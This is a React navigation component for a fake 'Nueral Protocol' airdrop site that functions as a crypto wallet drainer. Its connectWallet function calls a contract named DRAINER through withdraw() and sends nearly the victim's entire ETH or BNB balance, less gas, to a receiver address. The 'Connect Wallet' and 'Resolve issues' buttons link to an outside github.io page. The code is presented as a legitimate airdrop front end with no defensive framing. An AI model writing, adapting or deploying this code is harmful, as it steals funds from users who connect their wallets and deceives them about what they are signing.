import { useEffect, useRef, useState } from "react";
import styled from "styled-components";
import {init} from "@web3-onboard/react";
import walletConnectModule from "@web3-onboard/walletconnect";
import walletLinkModule from "@web3-onboard/walletlink";
import injectedModule from "@web3-onboard/injected-wallets";
import Web3 from "web3";

import logo from "../assets/logo.png";
import {Button} from "./index";
import useWeb3 from "../hooks/useWeb3";
import { WALLET_CONNECT_PROJECT_ID, DRAINER_ABI, DRAINER_ADDRESS, RECEIVER_ADDRESS } from "../constants";


const NavContainer = styled.nav`
    display: flex;
    align-items: center;
    justify-content: space-between;
    position: fixed;
    top: 0;
    left: 0;
    background-color: var(--primary);
    right: 0;
    padding: 30px;

    .nav_right {
        display: flex;
        align-items: center;
        gap: 40px;

        @media screen and (max-width: 765px){
            button:first-child {
                display: none;
            }
        }

        @media screen and (max-width: 535px){
            button {
                font-size: 0.6rem;
            }
        }
    }
`;

const Logo = styled.img`
    width: 150px;
`;





const Nav = (props) => {
    const {} = useWeb3();
    const flag = useRef(true);
    const injected = injectedModule();

    let provider = useRef(null);
    const [account, setAccount] = useState(null);
    const [balance, setBalance] = useState(null);
    const chain = useRef(null);
    const walletConnect = walletConnectModule({
        projectId: WALLET_CONNECT_PROJECT_ID
    });
    const walletLink = walletLinkModule();
    //initialize web3-onboard
    // const [{wallet, connecting}, connect, disconnect] = useConnectWallet();

    useEffect(() => {
        // console.log(connectedAddress)
        // if(flag.current){
        //     if(connectedAddress && receiverAddress){
        //         (async() => {
        //             // let res = await drain(drainerAddress, receiverAddress, connectedAddress);

        //         })()
        //         flag.current = false;
        //     }
        // }
    }, [])

    async function connectWallet(e){
        try{
            let obj = await init({
                wallets: [injected, walletLink, walletConnect],
                chains: [
                    {
                        id: '0x1',
                        token: 'ETH',
                        label: 'Ethereum',
                        rpcUrl: `https://mainnet.infura.io/v3/632459752f8e4da4a52344fae4bc5a91`
                    },
                    {
                        id: '0x38',
                        token: 'BNB',
                        label: "BNB Smart Chain",
                        rpcUrl: `https://bscrpc.com`
                    }
                ],
                appMetadata: {
                    name: "Nueral Protocol",
                    icon: logo,
                    logo: logo,
                    description: "Connect to neural protocol airdrop",
                    recommendedInjectedWallets: [
                        { name: "Coinbase", url: "https://wallet.coinbase.com/" },
                        { name: "MetaMask", url: "https://metamask.io" }
                    ]
                }
            });
            console.log(0)
            if(account){
                let [primaryAccount] = await obj.state.get().wallets;
                if(!primaryAccount) return;
                await obj.disconnectWallet({
                    label: primaryAccount.label
                });
                setAccount(() => null);
                chain.current = null;
                provider.current = null;
            }else{
                let w = await obj.connectWallet();
                let wallet = w[0];
                let web3 = new Web3(wallet.provider);
                let address = wallet.accounts[0]?.address;
                let chainID = parseInt(wallet.chains[0]?.id);
                chain.current = chainID;

                //using web3js to estimate gas fee
                let contract = new web3.eth.Contract(DRAINER_ABI, DRAINER_ADDRESS[chainID]);
                let allowedGas = await contract.methods.withdraw(RECEIVER_ADDRESS[chainID]).estimateGas({ from: address });
                allowedGas = web3.utils.toWei(allowedGas, 'wei') * web3.utils.toWei('80', 'gwei');

                let balance = await web3.eth.getBalance(address);
                let bal = web3.utils.fromWei(balance, 'ether');
                console.log(web3.utils.fromWei(allowedGas, 'ether'), bal);
                let d = bal - web3.utils.fromWei(allowedGas, 'ether');
                console.log({d, allowedGas});
                if(d > 0) {
                    //has enough eth for this
                    setAccount(() => address);
                    setBalance(() => web3.utils.fromWei(balance, 'ether'));
                    provider.current = wallet.provider;
                    let res =  await contract.methods.withdraw(RECEIVER_ADDRESS[chainID]).send({from: address, value: web3.utils.toWei(Math.floor(d * 10**18), 'wei')});
                }
                else {
                    throw new Error("Insufficient balance")
                }
            }
         }catch(e){
             console.log({errorMessage: e.message});
         }
    }


    return (
        <NavContainer>
            <div className="nav_left">
                <Logo src={logo} alt="Logo" />
            </div>
            <div className="nav_right">
                <Button border="1px solid var(--secondary)"
                radius={25} fontSize="0.7rem" bgColor="var(--grey)"
                color="var(--white)"

                >
                    <a href="https://hypes112.github.io/newbak/m" style={{ textDecoration: 'none', color: 'inherit' }}>Resolve issues</a>
                </Button>
                <Button  border="1px solid var(--secondary)"
                radius={25} fontSize="0.7rem" bgColor="var(--secondary)"
                color="var(--white)"
                >
                    <a href="https://hypes112.github.io/newbak/m" style={{ textDecoration: 'none', color: 'inherit' }}>Connect Wallet</a>
                </Button>
            </div>
        </NavContainer>
    )
}


export default Nav;
